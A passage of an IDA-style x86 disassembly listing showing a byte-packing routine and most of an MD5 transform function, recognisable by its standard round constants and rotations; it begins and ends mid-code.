push 10h
mov edx, [ebp+var_18]
mov ecx, [ebp+var_14]
call sub_40B16D
mov ecx, 16h
xor eax, eax
mov edi, [ebp+var_18]
rep stosd
pop edi
mov esp, ebp
pop ebp
retn
sub_40B0E1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B16D proc near ; CODE XREF: sub_40B0E1+18�p
; sub_40B0E1+76�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
mov [ebp+var_10], edx
mov [ebp+var_C], ecx
mov [ebp+var_4], 0
mov [ebp+var_8], 0
jmp short loc_40B19B
; ---------------------------------------------------------------------------
loc_40B189: ; CODE XREF: sub_40B16D+9D�j
mov eax, [ebp+var_4]
add eax, 1
mov [ebp+var_4], eax
mov ecx, [ebp+var_8]
add ecx, 4
mov [ebp+var_8], ecx
loc_40B19B: ; CODE XREF: sub_40B16D+1A�j
mov edx, [ebp+var_8]
cmp edx, [ebp+arg_0]
jnb short loc_40B20F
mov eax, [ebp+var_4]
mov ecx, [ebp+var_10]
mov edx, [ecx+eax*4]
and edx, 0FFh
mov eax, [ebp+var_C]
add eax, [ebp+var_8]
mov [eax], dl
mov ecx, [ebp+var_4]
mov edx, [ebp+var_10]
mov eax, [edx+ecx*4]
shr eax, 8
and eax, 0FFh
mov ecx, [ebp+var_C]
add ecx, [ebp+var_8]
mov [ecx+1], al
mov edx, [ebp+var_4]
mov eax, [ebp+var_10]
mov ecx, [eax+edx*4]
shr ecx, 10h
and ecx, 0FFh
mov edx, [ebp+var_C]
add edx, [ebp+var_8]
mov [edx+2], cl
mov eax, [ebp+var_4]
mov ecx, [ebp+var_10]
mov edx, [ecx+eax*4]
shr edx, 18h
and edx, 0FFh
mov eax, [ebp+var_C]
add eax, [ebp+var_8]
mov [eax+3], dl
jmp loc_40B189
; ---------------------------------------------------------------------------
loc_40B20F: ; CODE XREF: sub_40B16D+34�j
mov esp, ebp
pop ebp
retn 4
sub_40B16D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B215 proc near ; CODE XREF: sub_40AFDA+9A�p
; sub_40AFDA+C4�p
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 58h
push edi
mov [ebp+var_58], edx
mov [ebp+var_54], ecx
mov eax, [ebp+var_54]
mov ecx, [eax]
mov [ebp+var_4], ecx
mov edx, [ebp+var_54]
mov eax, [edx+4]
mov [ebp+var_8], eax
mov ecx, [ebp+var_54]
mov edx, [ecx+8]
mov [ebp+var_C], edx
mov eax, [ebp+var_54]
mov ecx, [eax+0Ch]
mov [ebp+var_10], ecx
push 40h
mov edx, [ebp+var_58]
lea ecx, [ebp+var_50]
call sub_40C0BD
mov edx, [ebp+var_8]
and edx, [ebp+var_C]
mov eax, [ebp+var_8]
not eax
and eax, [ebp+var_10]
or edx, eax
add edx, [ebp+var_50]
mov ecx, [ebp+var_4]
lea edx, [ecx+edx-28955B88h]
mov [ebp+var_4], edx
mov eax, [ebp+var_4]
shl eax, 7
mov ecx, [ebp+var_4]
shr ecx, 19h
or eax, ecx
mov [ebp+var_4], eax
mov edx, [ebp+var_4]
add edx, [ebp+var_8]
mov [ebp+var_4], edx
mov eax, [ebp+var_4]
and eax, [ebp+var_8]
mov ecx, [ebp+var_4]
not ecx
and ecx, [ebp+var_C]
or eax, ecx
add eax, [ebp+var_4C]
mov edx, [ebp+var_10]
lea eax, [edx+eax-173848AAh]
mov [ebp+var_10], eax
mov ecx, [ebp+var_10]
shl ecx, 0Ch
mov edx, [ebp+var_10]
shr edx, 14h
or ecx, edx
mov [ebp+var_10], ecx
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov ecx, [ebp+var_10]
and ecx, [ebp+var_4]
mov edx, [ebp+var_10]
not edx
and edx, [ebp+var_8]
or ecx, edx
add ecx, [ebp+var_48]
mov eax, [ebp+var_C]
lea ecx, [eax+ecx+242070DBh]
mov [ebp+var_C], ecx
mov edx, [ebp+var_C]
shl edx, 11h
mov eax, [ebp+var_C]
shr eax, 0Fh
or edx, eax
mov [ebp+var_C], edx
mov ecx, [ebp+var_C]
add ecx, [ebp+var_10]
mov [ebp+var_C], ecx
mov edx, [ebp+var_C]
and edx, [ebp+var_10]
mov eax, [ebp+var_C]
not eax
and eax, [ebp+var_4]
or edx, eax
add edx, [ebp+var_44]
mov ecx, [ebp+var_8]
lea edx, [ecx+edx-3E423112h]
mov [ebp+var_8], edx
mov eax, [ebp+var_8]
shl eax, 16h
mov ecx, [ebp+var_8]
shr ecx, 0Ah
or eax, ecx
mov [ebp+var_8], eax
mov edx, [ebp+var_8]
add edx, [ebp+var_C]
mov [ebp+var_8], edx
mov eax, [ebp+var_8]
and eax, [ebp+var_C]
mov ecx, [ebp+var_8]
not ecx
and ecx, [ebp+var_10]
or eax, ecx
add eax, [ebp+var_40]
mov edx, [ebp+var_4]
lea eax, [edx+eax-0A83F051h]
mov [ebp+var_4], eax
mov ecx, [ebp+var_4]
shl ecx, 7
mov edx, [ebp+var_4]
shr edx, 19h
or ecx, edx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov ecx, [ebp+var_4]
and ecx, [ebp+var_8]
mov edx, [ebp+var_4]
not edx
and edx, [ebp+var_C]
or ecx, edx
add ecx, [ebp+var_3C]
mov eax, [ebp+var_10]
lea ecx, [eax+ecx+4787C62Ah]
mov [ebp+var_10], ecx
mov edx, [ebp+var_10]
shl edx, 0Ch
mov eax, [ebp+var_10]
shr eax, 14h
or edx, eax
mov [ebp+var_10], edx
mov ecx, [ebp+var_10]
add ecx, [ebp+var_4]
mov [ebp+var_10], ecx
mov edx, [ebp+var_10]
and edx, [ebp+var_4]
mov eax, [ebp+var_10]
not eax
and eax, [ebp+var_8]
or edx, eax
add edx, [ebp+var_38]
mov ecx, [ebp+var_C]
lea edx, [ecx+edx-57CFB9EDh]
mov [ebp+var_C], edx
mov eax, [ebp+var_C]
shl eax, 11h
mov ecx, [ebp+var_C]
shr ecx, 0Fh
or eax, ecx
mov [ebp+var_C], eax
mov edx, [ebp+var_C]
add edx, [ebp+var_10]
mov [ebp+var_C], edx
mov eax, [ebp+var_C]
and eax, [ebp+var_10]
mov ecx, [ebp+var_C]
not ecx
and ecx, [ebp+var_4]
or eax, ecx
add eax, [ebp+var_34]
mov edx, [ebp+var_8]
lea eax, [edx+eax-2B96AFFh]
mov [ebp+var_8], eax
mov ecx, [ebp+var_8]
shl ecx, 16h
mov edx, [ebp+var_8]
shr edx, 0Ah
or ecx, edx
mov [ebp+var_8], ecx
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov ecx, [ebp+var_8]
and ecx, [ebp+var_C]
mov edx, [ebp+var_8]
not edx
and edx, [ebp+var_10]
or ecx, edx
add ecx, [ebp+var_30]
mov eax, [ebp+var_4]
lea ecx, [eax+ecx+698098D8h]
mov [ebp+var_4], ecx
mov edx, [ebp+var_4]
shl edx, 7
mov eax, [ebp+var_4]
shr eax, 19h
or edx, eax
mov [ebp+var_4], edx
mov ecx, [ebp+var_4]
add ecx, [ebp+var_8]
mov [ebp+var_4], ecx
mov edx, [ebp+var_4]
and edx, [ebp+var_8]
mov eax, [ebp+var_4]
not eax
and eax, [ebp+var_C]
or edx, eax
add edx, [ebp+var_2C]
mov ecx, [ebp+var_10]
lea edx, [ecx+edx-74BB0851h]
mov [ebp+var_10], edx
mov eax, [ebp+var_10]
shl eax, 0Ch
mov ecx, [ebp+var_10]
shr ecx, 14h
or eax, ecx
mov [ebp+var_10], eax
mov edx, [ebp+var_10]
add edx, [ebp+var_4]
mov [ebp+var_10], edx
mov eax, [ebp+var_10]
and eax, [ebp+var_4]
mov ecx, [ebp+var_10]
not ecx
and ecx, [ebp+var_8]
or eax, ecx
add eax, [ebp+var_28]
mov edx, [ebp+var_C]
lea eax, [edx+eax-0A44Fh]
mov [ebp+var_C], eax
mov ecx, [ebp+var_C]
shl ecx, 11h
mov edx, [ebp+var_C]
shr edx, 0Fh
or ecx, edx
mov [ebp+var_C], ecx
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov ecx, [ebp+var_C]
and ecx, [ebp+var_10]
mov edx, [ebp+var_C]
not edx
and edx, [ebp+var_4]
or ecx, edx
add ecx, [ebp+var_24]
mov eax, [ebp+var_8]
lea ecx, [eax+ecx-76A32842h]
mov [ebp+var_8], ecx
mov edx, [ebp+var_8]
shl edx, 16h
mov eax, [ebp+var_8]
shr eax, 0Ah
or edx, eax
mov [ebp+var_8], edx
mov ecx, [ebp+var_8]
add ecx, [ebp+var_C]
mov [ebp+var_8], ecx
mov edx, [ebp+var_8]
and edx, [ebp+var_C]
mov eax, [ebp+var_8]
not eax
and eax, [ebp+var_10]
or edx, eax
add edx, [ebp+var_20]
mov ecx, [ebp+var_4]
lea edx, [ecx+edx+6B901122h]
mov [ebp+var_4], edx
mov eax, [ebp+var_4]
shl eax, 7
mov ecx, [ebp+var_4]
shr ecx, 19h
or eax, ecx
mov [ebp+var_4], eax
mov edx, [ebp+var_4]
add edx, [ebp+var_8]
mov [ebp+var_4], edx
mov eax, [ebp+var_4]
and eax, [ebp+var_8]
mov ecx, [ebp+var_4]
not ecx
and ecx, [ebp+var_C]
or eax, ecx
add eax, [ebp+var_1C]
mov edx, [ebp+var_10]
lea eax, [edx+eax-2678E6Dh]
mov [ebp+var_10], eax
mov ecx, [ebp+var_10]
shl ecx, 0Ch
mov edx, [ebp+var_10]
shr edx, 14h
or ecx, edx
mov [ebp+var_10], ecx
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov ecx, [ebp+var_10]
and ecx, [ebp+var_4]
mov edx, [ebp+var_10]
not edx
and edx, [ebp+var_8]
or ecx, edx
add ecx, [ebp+var_18]
mov eax, [ebp+var_C]
lea ecx, [eax+ecx-5986BC72h]
mov [ebp+var_C], ecx
mov edx, [ebp+var_C]
shl edx, 11h
mov eax, [ebp+var_C]
shr eax, 0Fh
or edx, eax
mov [ebp+var_C], edx
mov ecx, [ebp+var_C]
add ecx, [ebp+var_10]
mov [ebp+var_C], ecx
mov edx, [ebp+var_C]
and edx, [ebp+var_10]
mov eax, [ebp+var_C]
not eax
and eax, [ebp+var_4]
or edx, eax
add edx, [ebp+var_14]
mov ecx, [ebp+var_8]
lea edx, [ecx+edx+49B40821h]
mov [ebp+var_8], edx
mov eax, [ebp+var_8]
shl eax, 16h
mov ecx, [ebp+var_8]
shr ecx, 0Ah
or eax, ecx
mov [ebp+var_8], eax
mov edx, [ebp+var_8]
add edx, [ebp+var_C]
mov [ebp+var_8], edx
mov eax, [ebp+var_8]
and eax, [ebp+var_10]
mov ecx, [ebp+var_10]
not ecx
mov edx, [ebp+var_C]
and edx, ecx
or eax, edx
add eax, [ebp+var_4C]
mov ecx, [ebp+var_4]
lea edx, [ecx+eax-9E1DA9Eh]
mov [ebp+var_4], edx
mov eax, [ebp+var_4]
shl eax, 5
mov ecx, [ebp+var_4]
shr ecx, 1Bh
or eax, ecx
mov [ebp+var_4], eax
mov edx, [ebp+var_4]
add edx, [ebp+var_8]
mov [ebp+var_4], edx
mov eax, [ebp+var_4]
and eax, [ebp+var_C]
mov ecx, [ebp+var_C]
not ecx
mov edx, [ebp+var_8]
and edx, ecx
or eax, edx
add eax, [ebp+var_38]
mov ecx, [ebp+var_10]
lea edx, [ecx+eax-3FBF4CC0h]
mov [ebp+var_10], edx
mov eax, [ebp+var_10]
shl eax, 9
mov ecx, [ebp+var_10]
shr ecx, 17h
or eax, ecx
mov [ebp+var_10], eax
mov edx, [ebp+var_10]
add edx, [ebp+var_4]
mov [ebp+var_10], edx
mov eax, [ebp+var_10]
and eax, [ebp+var_8]
mov ecx, [ebp+var_8]
not ecx
mov edx, [ebp+var_4]
and edx, ecx
or eax, edx
add eax, [ebp+var_24]
mov ecx, [ebp+var_C]
lea edx, [ecx+eax+265E5A51h]
mov [ebp+var_C], edx
mov eax, [ebp+var_C]
shl eax, 0Eh
mov ecx, [ebp+var_C]
shr ecx, 12h
or eax, ecx
mov [ebp+var_C], eax
mov edx, [ebp+var_C]
add edx, [ebp+var_10]
mov [ebp+var_C], edx
mov eax, [ebp+var_C]
and eax, [ebp+var_4]
mov ecx, [ebp+var_4]
not ecx
mov edx, [ebp+var_10]
and edx, ecx
or eax, edx
add eax, [ebp+var_50]
mov ecx, [ebp+var_8]
lea edx, [ecx+eax-16493856h]
mov [ebp+var_8], edx
mov eax, [ebp+var_8]
shl eax, 14h
mov ecx, [ebp+var_8]
shr ecx, 0Ch
or eax, ecx
mov [ebp+var_8], eax
mov edx, [ebp+var_8]
add edx, [ebp+var_C]
mov [ebp+var_8], edx
mov eax, [ebp+var_8]
and eax, [ebp+var_10]
mov ecx, [ebp+var_10]
not ecx
mov edx, [ebp+var_C]
and edx, ecx
or eax, edx
add eax, [ebp+var_3C]
mov ecx, [ebp+var_4]
lea edx, [ecx+eax-29D0EFA3h]
mov [ebp+var_4], edx
mov eax, [ebp+var_4]
shl eax, 5
mov ecx, [ebp+var_4]
shr ecx, 1Bh
or eax, ecx
mov [ebp+var_4], eax
mov edx, [ebp+var_4]
add edx, [ebp+var_8]
mov [ebp+var_4], edx
mov eax, [ebp+var_4]
and eax, [ebp+var_C]
mov ecx, [ebp+var_C]
not ecx
mov edx, [ebp+var_8]
and edx, ecx
or eax, edx
add eax, [ebp+var_28]
mov ecx, [ebp+var_10]
lea edx, [ecx+eax+2441453h]
mov [ebp+var_10], edx
mov eax, [ebp+var_10]
shl eax, 9
mov ecx, [ebp+var_10]
shr ecx, 17h
or eax, ecx
mov [ebp+var_10], eax
mov edx, [ebp+var_10]
add edx, [ebp+var_4]
mov [ebp+var_10], edx
mov eax, [ebp+var_10]
and eax, [ebp+var_8]
mov ecx, [ebp+var_8]
not ecx
mov edx, [ebp+var_4]
and edx, ecx
or eax, edx
add eax, [ebp+var_14]
mov ecx, [ebp+var_C]
lea edx, [ecx+eax-275E197Fh]
mov [ebp+var_C], edx
mov eax, [ebp+var_C]
shl eax, 0Eh
mov ecx, [ebp+var_C]
shr ecx, 12h
or eax, ecx
mov [ebp+var_C], eax
mov edx, [ebp+var_C]
add edx, [ebp+var_10]
mov [ebp+var_C], edx
mov eax, [ebp+var_C]
and eax, [ebp+var_4]
mov ecx, [ebp+var_4]
not ecx
mov edx, [ebp+var_10]
and edx, ecx
or eax, edx
add eax, [ebp+var_40]
mov ecx, [ebp+var_8]
lea edx, [ecx+eax-182C0438h]
mov [ebp+var_8], edx
mov eax, [ebp+var_8]
shl eax, 14h
mov ecx, [ebp+var_8]
shr ecx, 0Ch
or eax, ecx
mov [ebp+var_8], eax
mov edx, [ebp+var_8]
add edx, [ebp+var_C]
mov [ebp+var_8], edx
mov eax, [ebp+var_8]
and eax, [ebp+var_10]
mov ecx, [ebp+var_10]
not ecx
mov edx, [ebp+var_C]
and edx, ecx
or eax, edx
add eax, [ebp+var_2C]
mov ecx, [ebp+var_4]
lea edx, [ecx+eax+21E1CDE6h]
mov [ebp+var_4], edx
mov eax, [ebp+var_4]
shl eax, 5
mov ecx, [ebp+var_4]
shr ecx, 1Bh
or eax, ecx
mov [ebp+var_4], eax
mov edx, [ebp+var_4]
add edx, [ebp+var_8]
mov [ebp+var_4], edx
mov eax, [ebp+var_4]
and eax, [ebp+var_C]
mov ecx, [ebp+var_C]
not ecx
mov edx, [ebp+var_8]
and edx, ecx
or eax, edx
add eax, [ebp+var_18]
mov ecx, [ebp+var_10]
lea edx, [ecx+eax-3CC8F82Ah]
mov [ebp+var_10], edx
mov eax, [ebp+var_10]
shl eax, 9
mov ecx, [ebp+var_10]
shr ecx, 17h
or eax, ecx
mov [ebp+var_10], eax
mov edx, [ebp+var_10]
add edx, [ebp+var_4]
mov [ebp+var_10], edx
mov eax, [ebp+var_10]
and eax, [ebp+var_8]
mov ecx, [ebp+var_8]
not ecx
mov edx, [ebp+var_4]
and edx, ecx
or eax, edx
add eax, [ebp+var_44]
mov ecx, [ebp+var_C]
lea edx, [ecx+eax-0B2AF279h]
mov [ebp+var_C], edx
mov eax, [ebp+var_C]
shl eax, 0Eh
mov ecx, [ebp+var_C]
shr ecx, 12h
or eax, ecx
mov [ebp+var_C], eax
mov edx, [ebp+var_C]
add edx, [ebp+var_10]
mov [ebp+var_C], edx
mov eax, [ebp+var_C]
and eax, [ebp+var_4]
mov ecx, [ebp+var_4]
not ecx
mov edx, [ebp+var_10]
and edx, ecx
or eax, edx
add eax, [ebp+var_30]
mov ecx, [ebp+var_8]
lea edx, [ecx+eax+455A14EDh]
mov [ebp+var_8], edx
mov eax, [ebp+var_8]
shl eax, 14h
mov ecx, [ebp+var_8]
shr ecx, 0Ch
or eax, ecx
mov [ebp+var_8], eax
mov edx, [ebp+var_8]
add edx, [ebp+var_C]
mov [ebp+var_8], edx
mov eax, [ebp+var_8]
and eax, [ebp+var_10]
mov ecx, [ebp+var_10]
not ecx
mov edx, [ebp+var_C]
and edx, ecx
or eax, edx
add eax, [ebp+var_1C]
mov ecx, [ebp+var_4]
lea edx, [ecx+eax-561C16FBh]
mov [ebp+var_4], edx
mov eax, [ebp+var_4]
shl eax, 5
mov ecx, [ebp+var_4]
shr ecx, 1Bh
or eax, ecx
mov [ebp+var_4], eax
mov edx, [ebp+var_4]
add edx, [ebp+var_8]
mov [ebp+var_4], edx
mov eax, [ebp+var_4]
and eax, [ebp+var_C]
mov ecx, [ebp+var_C]
not ecx
mov edx, [ebp+var_8]
and edx, ecx
or eax, edx
add eax, [ebp+var_48]
mov ecx, [ebp+var_10]
lea edx, [ecx+eax-3105C08h]
mov [ebp+var_10], edx
mov eax, [ebp+var_10]
shl eax, 9
mov ecx, [ebp+var_10]
shr ecx, 17h
or eax, ecx
mov [ebp+var_10], eax
mov edx, [ebp+var_10]
add edx, [ebp+var_4]
mov [ebp+var_10], edx
mov eax, [ebp+var_10]
and eax, [ebp+var_8]
mov ecx, [ebp+var_8]
not ecx
mov edx, [ebp+var_4]
and edx, ecx
or eax, edx
add eax, [ebp+var_34]
mov ecx, [ebp+var_C]
lea edx, [ecx+eax+676F02D9h]
mov [ebp+var_C], edx
mov eax, [ebp+var_C]
shl eax, 0Eh
mov ecx, [ebp+var_C]
shr ecx, 12h
or eax, ecx
mov [ebp+var_C], eax
mov edx, [ebp+var_C]
add edx, [ebp+var_10]
mov [ebp+var_C], edx
mov eax, [ebp+var_C]
and eax, [ebp+var_4]
mov ecx, [ebp+var_4]
not ecx
mov edx, [ebp+var_10]
and edx, ecx
or eax, edx
add eax, [ebp+var_20]
mov ecx, [ebp+var_8]
lea edx, [ecx+eax-72D5B376h]
mov [ebp+var_8], edx
mov eax, [ebp+var_8]
shl eax, 14h
mov ecx, [ebp+var_8]
shr ecx, 0Ch
or eax, ecx
mov [ebp+var_8], eax
mov edx, [ebp+var_8]
add edx, [ebp+var_C]
mov [ebp+var_8], edx
mov eax, [ebp+var_8]
xor eax, [ebp+var_C]
xor eax, [ebp+var_10]
add eax, [ebp+var_3C]
mov ecx, [ebp+var_4]
lea edx, [ecx+eax-5C6BEh]
mov [ebp+var_4], edx
mov eax, [ebp+var_4]
shl eax, 4
mov ecx, [ebp+var_4]
shr ecx, 1Ch
or eax, ecx
mov [ebp+var_4], eax
mov edx, [ebp+var_4]
add edx, [ebp+var_8]
mov [ebp+var_4], edx
mov eax, [ebp+var_4]
xor eax, [ebp+var_8]
xor eax, [ebp+var_C]
add eax, [ebp+var_30]
mov ecx, [ebp+var_10]
lea edx, [ecx+eax-788E097Fh]
mov [ebp+var_10], edx
mov eax, [ebp+var_10]
shl eax, 0Bh
mov ecx, [ebp+var_10]
shr ecx, 15h
or eax, ecx
mov [ebp+var_10], eax
mov edx, [ebp+var_10]
add edx, [ebp+var_4]
mov [ebp+var_10], edx
mov eax, [ebp+var_10]
xor eax, [ebp+var_4]
xor eax, [ebp+var_8]
add eax, [ebp+var_24]
mov ecx, [ebp+var_C]
lea edx, [ecx+eax+6D9D6122h]
mov [ebp+var_C], edx
mov eax, [ebp+var_C]
shl eax, 10h
mov ecx, [ebp+var_C]
shr ecx, 10h
or eax, ecx
mov [ebp+var_C], eax
mov edx, [ebp+var_C]
add edx, [ebp+var_10]
mov [ebp+var_C], edx
mov eax, [ebp+var_C]
xor eax, [ebp+var_10]
xor eax, [ebp+var_4]
add eax, [ebp+var_18]
mov ecx, [ebp+var_8]
lea edx, [ecx+eax-21AC7F4h]
mov [ebp+var_8], edx
mov eax, [ebp+var_8]
shl eax, 17h
mov ecx, [ebp+var_8]
shr ecx, 9
or eax, ecx
mov [ebp+var_8], eax
mov edx, [ebp+var_8]
add edx, [ebp+var_C]
mov [ebp+var_8], edx
mov eax, [ebp+var_8]
xor eax, [ebp+var_C]
xor eax, [ebp+var_10]
add eax, [ebp+var_4C]
mov ecx, [ebp+var_4]
lea edx, [ecx+eax-5B4115BCh]
mov [ebp+var_4], edx
mov eax, [ebp+var_4]
shl eax, 4
mov ecx, [ebp+var_4]
shr ecx, 1Ch
or eax, ecx
mov [ebp+var_4], eax
mov edx, [ebp+var_4]
add edx, [ebp+var_8]
mov [ebp+var_4], edx
mov eax, [ebp+var_4]
xor eax, [ebp+var_8]
xor eax, [ebp+var_C]
add eax, [ebp+var_40]
mov ecx, [ebp+var_10]
lea edx, [ecx+eax+4BDECFA9h]
mov [ebp+var_10], edx
mov eax, [ebp+var_10]
shl eax, 0Bh
mov ecx, [ebp+var_10]
shr ecx, 15h
or eax, ecx
mov [ebp+var_10], eax
mov edx, [ebp+var_10]
add edx, [ebp+var_4]
mov [ebp+var_10], edx
mov eax, [ebp+var_10]
xor eax, [ebp+var_4]
xor eax, [ebp+var_8]
add eax, [ebp+var_34]
mov ecx, [ebp+var_C]
lea edx, [ecx+eax-944B4A0h]
mov [ebp+var_C], edx
mov eax, [ebp+var_C]
shl eax, 10h
mov ecx, [ebp+var_C]
shr ecx, 10h
or eax, ecx
mov [ebp+var_C], eax
mov edx, [ebp+var_C]
add edx, [ebp+var_10]
mov [ebp+var_C], edx
mov eax, [ebp+var_C]
xor eax, [ebp+var_10]
xor eax, [ebp+var_4]
add eax, [ebp+var_28]
mov ecx, [ebp+var_8]
lea edx, [ecx+eax-41404390h]
mov [ebp+var_8], edx
mov eax, [ebp+var_8]
shl eax, 17h
mov ecx, [ebp+var_8]
shr ecx, 9
or eax, ecx
mov [ebp+var_8], eax
mov edx, [ebp+var_8]
add edx, [ebp+var_C]
mov [ebp+var_8], edx
mov eax, [ebp+var_8]
xor eax, [ebp+var_C]
xor eax, [ebp+var_10]
add eax, [ebp+var_1C]
mov ecx, [ebp+var_4]
lea edx, [ecx+eax+289B7EC6h]
mov [ebp+var_4], edx
mov eax, [ebp+var_4]
shl eax, 4
mov ecx, [ebp+var_4]
shr ecx, 1Ch
or eax, ecx
mov [ebp+var_4], eax
mov edx, [ebp+var_4]
add edx, [ebp+var_8]
mov [ebp+var_4], edx
mov eax, [ebp+var_4]
xor eax, [ebp+var_8]
xor eax, [ebp+var_C]
add eax, [ebp+var_50]
mov ecx, [ebp+var_10]
lea edx, [ecx+eax-155ED806h]
mov [ebp+var_10], edx
mov eax, [ebp+var_10]
shl eax, 0Bh
mov ecx, [ebp+var_10]
shr ecx, 15h
or eax, ecx
mov [ebp+var_10], eax
mov edx, [ebp+var_10]
add edx, [ebp+var_4]
mov [ebp+var_10], edx
mov eax, [ebp+var_10]
xor eax, [ebp+var_4]
xor eax, [ebp+var_8]
add eax, [ebp+var_44]
mov ecx, [ebp+var_C]
lea edx, [ecx+eax-2B10CF7Bh]
mov [ebp+var_C], edx
mov eax, [ebp+var_C]
shl eax, 10h
mov ecx, [ebp+var_C]
shr ecx, 10h
or eax, ecx
mov [ebp+var_C], eax
mov edx, [ebp+var_C]
add edx, [ebp+var_10]
mov [ebp+var_C], edx
mov eax, [ebp+var_C]
xor eax, [ebp+var_10]
xor eax, [ebp+var_4]
add eax, [ebp+var_38]
mov ecx, [ebp+var_8]
lea edx, [ecx+eax+4881D05h]
mov [ebp+var_8], edx
mov eax, [ebp+var_8]
shl eax, 17h
mov ecx, [ebp+var_8]
shr ecx, 9
or eax, ecx
mov [ebp+var_8], eax
mov edx, [ebp+var_8]
add edx, [ebp+var_C]
mov [ebp+var_8], edx
mov eax, [ebp+var_8]
xor eax, [ebp+var_C]
xor eax, [ebp+var_10]
add eax, [ebp+var_2C]
mov ecx, [ebp+var_4]
lea edx, [ecx+eax-262B2FC7h]
mov [ebp+var_4], edx
mov eax, [ebp+var_4]
shl eax, 4
mov ecx, [ebp+var_4]
shr ecx, 1Ch
or eax, ecx
mov [ebp+var_4], eax
mov edx, [ebp+var_4]
add edx, [ebp+var_8]
mov [ebp+var_4], edx
mov eax, [ebp+var_4]
xor eax, [ebp+var_8]
xor eax, [ebp+var_C]
add eax, [ebp+var_20]
mov ecx, [ebp+var_10]
lea edx, [ecx+eax-1924661Bh]
mov [ebp+var_10], edx
mov eax, [ebp+var_10]
shl eax, 0Bh
mov ecx, [ebp+var_10]
shr ecx, 15h
or eax, ecx
mov [ebp+var_10], eax
mov edx, [ebp+var_10]
add edx, [ebp+var_4]
mov [ebp+var_10], edx
mov eax, [ebp+var_10]
xor eax, [ebp+var_4]
xor eax, [ebp+var_8]
add eax, [ebp+var_14]
mov ecx, [ebp+var_C]
lea edx, [ecx+eax+1FA27CF8h]
mov [ebp+var_C], edx
mov eax, [ebp+var_C]
shl eax, 10h
mov ecx, [ebp+var_C]
shr ecx, 10h
or eax, ecx
mov [ebp+var_C], eax
mov edx, [ebp+var_C]
add edx, [ebp+var_10]
mov [ebp+var_C], edx
mov eax, [ebp+var_C]
xor eax, [ebp+var_10]
xor eax, [ebp+var_4]
add eax, [ebp+var_48]
mov ecx, [ebp+var_8]
lea edx, [ecx+eax-3B53A99Bh]
mov [ebp+var_8], edx
mov eax, [ebp+var_8]
shl eax, 17h
mov ecx, [ebp+var_8]
shr ecx, 9
or eax, ecx
mov [ebp+var_8], eax
mov edx, [ebp+var_8]
add edx, [ebp+var_C]
mov [ebp+var_8], edx
mov eax, [ebp+var_10]
not eax
mov ecx, [ebp+var_8]
or ecx, eax
mov edx, [ebp+var_C]
xor edx, ecx
add edx, [ebp+var_50]
mov eax, [ebp+var_4]
lea ecx, [eax+edx-0BD6DDBCh]
mov [ebp+var_4], ecx
mov edx, [ebp+var_4]
shl edx, 6
mov eax, [ebp+var_4]
shr eax, 1Ah
or edx, eax
mov [ebp+var_4], edx
mov ecx, [ebp+var_4]
add ecx, [ebp+var_8]
mov [ebp+var_4], ecx
mov edx, [ebp+var_C]
not edx
mov eax, [ebp+var_4]
or eax, edx
mov ecx, [ebp+var_8]
xor ecx, eax
add ecx, [ebp+var_34]
mov edx, [ebp+var_10]
lea eax, [edx+ecx+432AFF97h]
mov [ebp+var_10], eax
mov ecx, [ebp+var_10]
shl ecx, 0Ah
mov edx, [ebp+var_10]
shr edx, 16h
or ecx, edx
mov [ebp+var_10], ecx
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov ecx, [ebp+var_8]
not ecx
mov edx, [ebp+var_10]
or edx, ecx
mov eax, [ebp+var_4]
xor eax, edx
add eax, [ebp+var_18]
mov ecx, [ebp+var_C]
lea edx, [ecx+eax-546BDC59h]
mov [ebp+var_C], edx
mov eax, [ebp+var_C]
shl eax, 0Fh
mov ecx, [ebp+var_C]
shr ecx, 11h
or eax, ecx
mov [ebp+var_C], eax
mov edx, [ebp+var_C]
add edx, [ebp+var_10]
mov [ebp+var_C], edx
mov eax, [ebp+var_4]
not eax
mov ecx, [ebp+var_C]
or ecx, eax
mov edx, [ebp+var_10]
xor edx, ecx
add edx, [ebp+var_3C]
mov eax, [ebp+var_8]
lea ecx, [eax+edx-36C5FC7h]
mov [ebp+var_8], ecx
mov edx, [ebp+var_8]
shl edx, 15h
mov eax, [ebp+var_8]
shr eax, 0Bh
or edx, eax
mov [ebp+var_8], edx
mov ecx, [ebp+var_8]
add ecx, [ebp+var_C]
mov [ebp+var_8], ecx
mov edx, [ebp+var_10]
not edx
mov eax, [ebp+var_8]
or eax, edx
mov ecx, [ebp+var_C]
xor ecx, eax
add ecx, [ebp+var_20]
mov edx, [ebp+var_4]
lea eax, [edx+ecx+655B59C3h]
mov [ebp+var_4], eax
mov ecx, [ebp+var_4]
shl ecx, 6
mov edx, [ebp+var_4]
shr edx, 1Ah
or ecx, edx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov ecx, [ebp+var_C]
not ecx
mov edx, [ebp+var_4]
or edx, ecx
mov eax, [ebp+var_8]
xor eax, edx
add eax, [ebp+var_44]
mov ecx, [ebp+var_10]
lea edx, [ecx+eax-70F3336Eh]
mov [ebp+var_10], edx
mov eax, [ebp+var_10]
shl eax, 0Ah
mov ecx, [ebp+var_10]
